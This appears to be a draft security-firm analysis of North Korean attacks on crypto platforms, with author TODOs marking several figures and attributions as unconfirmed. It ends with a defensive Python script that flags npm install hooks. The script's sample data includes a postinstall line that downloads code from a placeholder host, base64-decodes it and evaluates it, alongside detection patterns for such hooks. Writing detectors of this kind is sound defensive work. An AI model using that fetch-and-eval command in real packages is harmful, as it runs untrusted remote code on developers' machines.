The Problem
DPRK-affiliated threat actors, chiefly the Lazarus Group umbrella with its financially-motivated APT38 unit and sub-clusters such as TraderTraitor, are now the most consequential state-sponsored threat in Web3. The FBI has publicly attributed multiple nine- and ten-figure crypto thefts to North Korean operations, and the pattern is accelerating: IT-worker infiltration under fabricated identities, high-volume spear-phishing of developers and executives, social engineering of signing operations, and post-compromise laundering through mixers and cross-chain bridges. TODO(author): add a short paragraph quantifying the scale (stolen value in 2024–2025, number of distinct incidents, estimated share of all crypto-theft losses) once numbers are sourced from Chainalysis / TRM / FBI statements.
Scope
This analysis covers publicly reported DPRK-attributed incidents against Web3 infrastructure, not internal CODESPECT engagements. Each incident is referenced only as far as its attribution is public.

Incidents analyzed:

- **Bybit (February 2025).** Approximately $1.5B in ETH drained from a Safe multisig cold wallet. Publicly attributed by the FBI to DPRK-linked actors (TraderTraitor / Lazarus). The signers approved a transaction whose preview in the Safe web UI had been tampered with, so their hardware wallets signed a payload different from the one displayed on screen. TODO(author): confirm the exact attack chain and cite the FBI advisory.
- **KelpDAO.** TODO(author): confirm the specific incident, its attribution, the vector, and the amount before publishing. Do not describe until verified.
- **Ronin Bridge (March 2022).** Approximately $625M taken from the Ronin bridge after the attacker obtained signatures from five of its nine validator keys. US Treasury (OFAC) sanctioned the receiving address and attributed the attack to Lazarus Group. TODO(author): confirm figure against the OFAC advisory.
- **Harmony Horizon Bridge (June 2022).** Approximately $100M taken from the Horizon bridge; the FBI attributed the theft to Lazarus Group and APT38 in January 2023. TODO(author): cite the FBI statement.
- **Atomic Wallet (June 2023).** TODO(author): confirm attribution and amount.
- **Additional 2024–2025 incidents.** TODO(author): list the most recent DPRK-attributed incidents at time of publication (e.g. DMM Bitcoin, WazirX, Radiant Capital, etc., if the attribution is still accurate).
Findings
Across these incidents, four recurring attacker techniques emerge. Each has direct implications for how Web3 teams should defend.

**1. IT-worker infiltration.** DPRK operators apply for remote developer and contractor roles under fabricated identities, sometimes via legitimate freelance platforms. Once hired, they gain code-commit access, CI secrets, and privileged infrastructure. Whatever the initial foothold (a hired insider, a phished developer, or, as in the Bybit case, a compromised developer workstation at a third-party wallet provider), the intrusion begins weeks to months before the visible theft; the theft is the last step of the operation, not the first.

**2. Targeted social engineering of signing operations.** Multiple recent thefts relied on compromising what a signer *saw*, not the key material itself. Attackers manipulated the signing UI, transaction preview, or approval workflow rather than breaking cryptography. This shifts the defensive priority from "secure the keys" to "verify the thing you are about to sign": the digest shown on the hardware wallet should be compared against one computed from the raw transaction parameters independently of the web front-end, and a delegatecall from a treasury wallet should be treated as hostile by default.

**3. Supply-chain compromise.** DPRK groups have delivered implants through malicious npm packages, PyPI packages, and tampered build artifacts, often via install-time hooks, with preferential targeting of Web3 developer tooling.

**4. Post-compromise laundering.** Funds move through mixers, cross-chain bridges, and rapid stablecoin conversion. Speed of detection matters: the first 60 minutes are where recoverable value lives.

TODO(author): expand each bullet with one concrete, citable example from the incidents above.
Outcome
CODESPECT red teaming and operations security engagements are scoped specifically against these DPRK techniques.

- **DPRK screening** during hiring and contractor onboarding: structured identity verification, history-consistency checks, OSINT, and live video verification protocols that defeat pre-recorded deepfake interviews.
- **Signing-operation red teaming:** simulated attacker-in-the-middle against Safe multisig workflows, hardware wallet UX review, and transaction-preview integrity testing, modeled directly on the Bybit-class attack chain.
- **Supply-chain review** of developer toolchains, CI/CD secrets, and third-party dependencies, including the specific npm/PyPI package families DPRK groups have previously used.
- **Phishing simulation** calibrated to observed DPRK TTPs: recruiter impersonation, Zoom/Signal-installer decoys, malicious NFT metadata, and targeted Telegram approaches.
- **Incident-response readiness** with SEAL 911 integration, so that first-hour response is a rehearsed playbook rather than an improvisation.

TODO(author): if and when CODESPECT publishes anonymized statistics from its own red team engagements (e.g. "X screenings performed, Y DPRK-linked candidates flagged"), add them here. Do not fabricate.
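For the dependency part of a supply-chain review, the following is an added triage script (not CODESPECT's tooling, and not derived from any specific malicious package) that lists every npm package in a tree declaring a lifecycle install hook and flags hook scripts that download, decode, or evaluate code at install time, the mechanism malicious npm packages commonly rely on. The sample manifests are constructed, the package names are invented, and the regex list is a starting point rather than a complete signature set; `load_node_modules` reads a real installed tree.

```python
# Added example (not CODESPECT's tooling): triage npm dependencies for lifecycle
# install hooks and for hook scripts that fetch/decode/evaluate code at install
# time. Sample manifests below are constructed; package names are invented.
import json
import re
from pathlib import Path

HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Patterns that rarely belong in a legitimate native-build step (starting set, not exhaustive).
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b"), "downloads at install time"),
    (re.compile(r"node\s+-e\b"), "inline node evaluation"),
    (re.compile(r"\beval\s*\("), "eval"),
    (re.compile(r"base64|atob\("), "base64-encoded payload"),
    (re.compile(r"child_process|\bexec\s*\("), "spawns a process"),
]

def audit_package(name: str, manifest: dict) -> list:
    """Findings for one package.json as (package, hook, reason) tuples."""
    findings = []
    for hook in HOOKS:
        script = manifest.get("scripts", {}).get(hook)
        if script is None:
            continue
        # Any install hook is worth a human look; suspicious content gets specific reasons.
        reasons = [why for pat, why in SUSPICIOUS if pat.search(script)] or ["declares an install hook"]
        findings.extend((name, hook, why) for why in reasons)
    return findings

def audit_tree(manifests: dict) -> list:
    """manifests: {package name: parsed package.json}; returns all findings, sorted by package."""
    out = []
    for name, manifest in sorted(manifests.items()):
        out.extend(audit_package(name, manifest))
    return out

def load_node_modules(root: str) -> dict:
    """Collect package.json files from an installed node_modules tree (nested packages too)."""
    manifests = {}
    for p in Path(root).rglob("package.json"):
        try:
            m = json.loads(p.read_text(encoding="utf-8"))
        except (ValueError, OSError):
            continue
        manifests[m.get("name", str(p.parent))] = m
    return manifests

# Constructed sample tree: a clean package, a native module with a build hook (review,
# probably fine), and one that fetches and evaluates code at install time (treat as an incident).
SAMPLE = {
    "left-pad-ish": {"name": "left-pad-ish", "scripts": {"test": "node test.js"}},
    "native-thing": {"name": "native-thing", "scripts": {"install": "node-gyp rebuild"}},
    "wallet-helper": {"name": "wallet-helper", "scripts": {
        "postinstall": "curl -s https://example.invalid/x | base64 -d | node -e "
                       "\"eval(require('fs').readFileSync(0,'utf8'))\""}},
}

if __name__ == "__main__":
    for pkg, hook, why in audit_tree(SAMPLE):
        print(f"{pkg}: {hook} -> {why}")
```

Run it against a real tree with `audit_tree(load_node_modules("node_modules"))`. In CI, pair it with `ignore-scripts=true` in `.npmrc` (or `npm ci --ignore-scripts`) so that no hook runs by default, then re-enable scripts only for the packages the review has explicitly allow-listed; a hook that downloads or evaluates code at install time should be treated as a compromise, not a finding to schedule.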